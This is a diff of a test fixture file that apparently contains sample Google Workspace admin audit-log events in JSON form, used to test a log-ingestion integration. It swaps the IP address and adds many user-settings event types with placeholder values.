-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
